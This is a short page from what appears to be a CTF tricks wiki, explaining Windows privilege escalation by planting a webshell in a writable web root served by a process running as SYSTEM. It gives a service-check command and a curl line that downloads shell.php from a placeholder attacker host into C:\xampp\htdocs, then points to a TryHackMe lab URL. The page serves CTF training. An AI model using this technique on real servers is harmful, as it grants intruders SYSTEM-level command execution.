> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/trick-0050/privilege-escalation-windows-web.md).

# Web

## Webshell As System Via Writable Web Root

If the web server process is running with high privileges (like `NT AUTHORITY\SYSTEM` on Windows) and its web root directory is writable by your current user, you can upload a webshell to gain command execution as that privileged user.

First, confirm the service context (e.g., for Apache2.4):

```powershell
sc qc Apache2.4
```

If it runs as `LocalSystem`, navigate to the web root directory. For XAMPP installations, this is commonly the `htdocs` folder. The scenario relies on having write permissions within this directory to facilitate webshell upload. Navigate to this directory (e.g., `C:\xampp\htdocs`) and upload your webshell script. Ensure your user has write permissions here.

```powershell
cd C:\xampp\htdocs
curl http://IP_ADDRESS:8000/shell.php -o .\shell.php
```

Access the uploaded webshell in a browser (e.g., `http://avenger.tryhackme/gift/shell.php`) to execute commands with the privileges of the web server process (`NT AUTHORITY\SYSTEM`).
